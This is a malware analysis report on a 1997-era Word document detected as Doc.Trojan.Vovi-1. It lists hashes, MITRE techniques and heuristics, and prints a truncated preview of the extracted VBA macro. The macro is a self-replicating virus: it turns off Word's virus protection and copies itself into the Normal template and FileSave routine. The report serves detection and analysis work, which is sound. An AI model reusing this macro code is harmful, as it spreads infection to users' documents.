Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 161dcb32fa0ee2df…

MALICIOUS

Office (OLE)

35.0 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 00609763fe7accb9319bd6b22688fd38 SHA-1: 311022d913225a39eff8b032f4362b6d1f7c26e4 SHA-256: 161dcb32fa0ee2dffb1d74fe04059a0e4f6f26f348566a7740e264eff8914d65
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a WordBasic AutoOpen macro. This macro attempts to copy itself into the Normal template and modify its behavior, likely to establish persistence or evade detection. The presence of legacy WordBasic macros and the AutoOpen entry point are strong indicators of older malware techniques.

Heuristics 4

  • ClamAV: Doc.Trojan.Vovi-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Vovi-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6823 bytes
SHA-256: 7d52492fb81bf14bb9447b3cdbd020721d201c0123e8bbaa73f26a1f87b09c4b
Detection
ClamAV: Doc.Trojan.Vovi-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

    On Error GoTo Err
    GoTo Cont
    
Err:
    Exit Sub
    
Cont:
    For Each comp In NormalTemplate.VBProject.VBComponents
'        MsgBox comp.Name
        If comp.Name = "NewMacros" Then
            foundNM = True
            Exit For
        End If
    Next comp
    
    If foundNM = False Then
        NormalTemplate.VBProject.VBComponents.Add (1)
        For Each comp In NormalTemplate.VBProject.VBComponents
'            MsgBox comp.Name
'            MsgBox comp.Type
            If comp.CodeModule.CountOfLines = 0 Then
                If comp.Type = 1 Then
                    comp.Name = "NewMacros"
                    Exit For
                End If
            End If
        Next comp
    End If
    
    If comp.CodeModule.Find("VoviusFirstMacroVirus", _
                1, 1, comp.CodeModule.CountOfLines, 1) = True Then
'        MsgBox "Virus was found"
        Exit Sub
    End If
    
    Options.VirusProtection = False
    If comp.CodeModule.Find("FileSave", _
                1, 1, comp.CodeModule.CountOfLines, 1) = False Then
'        MsgBox "Not Found FileSave. Adding."
        i = comp.CodeModule.CountOfLines
        j = comp.CodeModule.InsertLines(i + 1, "Sub FileSave" _
                + Chr(10) + "End Sub")
 '       i = comp.CodeModule.ProcStartLine("FileSave", vbext_pk_Proc)
'        MsgBox comp.CodeModule.Lines(i, 10)
        fs = 0
    Else
'        MsgBox "Found FileSave"
        fs = 2
    End If
    
 '   MsgBox "Writing FileS To FileSave"
    For Each thiscomp In ActiveDocument.VBProject.VBComponents
 '       MsgBox thiscomp.Name
        If thiscomp.Name = "NewMacros" Then
            Exit For
        End If
    Next thiscomp
    
    i = comp.CodeModule.ProcStartLine("FileSave", vbext_pk_Proc)
    thisi = thiscomp.CodeModule.ProcStartLine("FileS", vbext_pk_Proc)
    thiscount = thiscomp.CodeModule.ProcCountLines("FileS", vbext_pk_Proc)
    j = comp.CodeModule.InsertLines(i + 1, _
                thiscomp.CodeModule.Lines(thisi + 1, thiscount - 2 - fs))
'    MsgBox comp.CodeModule.Lines(i, 10)
        
'    MsgBox "Writing FileS To FileS"
    i = comp.CodeModule.CountOfLines
    thisi = thiscomp.CodeModule.ProcStartLine("FileS", vbext_pk_Proc)
    thiscount = thiscomp.CodeModule.ProcCountLines("FileS", vbext_pk_Proc)
    j = comp.CodeModule.InsertLines(i + 1, _
                thiscomp.CodeModule.Lines(thisi, thiscount))
'    MsgBox comp.CodeModule.Lines(i + 1, 10)
    
'    MsgBox "Adding AutoOp"
    i = comp.CodeModule.CountOfLines
    j = comp.CodeModule.InsertLines(i, "Sub AutoOp" _
                + Chr(10) + "End Sub")
 '   i = comp.CodeModule.ProcStartLine("AutoOp", vbext_pk_Proc)
'    MsgBox comp.CodeModule.Lines(i, 10)
    
'    MsgBox "Writing AutoOpen To AutoOp"
    i = comp.CodeModule.ProcStartLine("AutoOp", vbext_pk_Proc)
    thisi = thiscomp.CodeModule.ProcStartLine("AutoOpen", vbext_pk_Proc)
    thiscount = thiscomp.CodeModule.ProcCountLines("AutoOpen", vbext_pk_Proc)
    j = comp.CodeModule.InsertLines(i + 1, _
                thiscomp.CodeModule.Lines(thisi + 1, thiscount - 2))
'    MsgBox comp.CodeModule.Lines(i, 10)
    
'    MsgBox "Writing label."
    i = comp.CodeModule.CountOfLines
    j = comp.CodeModule.InsertLines(i + 1, "Sub VoviusFirstMacroVirus" _
                    + Chr(10) + Chr(10) + "End Sub")
'    i = comp.CodeModule.ProcStartLine("VoviusFirstMacroVirus", vbext_pk_Proc)
 '   MsgBox comp.CodeModule.Lines(i, 10)
End Sub
Sub FileS()

    On Error GoTo Err
    GoTo Cont
Err:
    Exit Sub
    
Cont:
    For Each comp In ActiveDocument.VBProject.VBComponents
'        MsgBox comp.Name
        If comp.Name = "NewMacros" Then
            foundNM = True
            Exit 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.